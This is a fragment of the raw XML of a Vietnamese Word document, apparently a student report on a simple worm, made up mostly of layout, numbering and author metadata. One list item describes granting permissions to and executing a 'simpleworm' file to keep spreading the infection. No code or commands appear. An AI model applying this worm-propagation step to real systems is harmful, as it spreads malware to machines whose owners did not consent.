            <wp:extent cx="5731510" cy="1055370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17" name="Hình ảnh 1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ình ảnh 17" descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1055370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E5651" w14:textId="32FA1507" w:rsidR="003042D7" w:rsidRPr="003042D7" w:rsidRDefault="003042D7" w:rsidP="003042D7">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003042D7">
        <w:t>Cấp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quyền và thực thi file simpleworm để tiếp tục lây nhiễm </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003042D7" w:rsidRPr="003042D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8093A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABDECEF0"/>
    <w:lvl w:ilvl="0" w:tplc="EEEEDE6E">
      <w:start w:val="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5533ECE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1F4B058"/>
    <w:lvl w:ilvl="0" w:tplc="7420739E">
      <w:start w:val="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58372292">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="316887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BD3"/>
    <w:rsid w:val="000F1297"/>
    <w:rsid w:val="0013749D"/>
    <w:rsid w:val="003039F1"/>
    <w:rsid w:val="003042D7"/>
    <w:rsid w:val="00783357"/>
    <w:rsid w:val="00D904BF"/>
    <w:rsid w:val="00DB1232"/>
    <w:rsid w:val="00EC4BD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061FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E1462E25-1DF2-4D4A-9ABA-DDF43904D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F1297"/>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D90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55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446</Words>
  <Characters>2544</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>21</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Hoàng Thạch Thiết</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vũ Hoàng Thạch Thiết</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T08:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-18T14:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>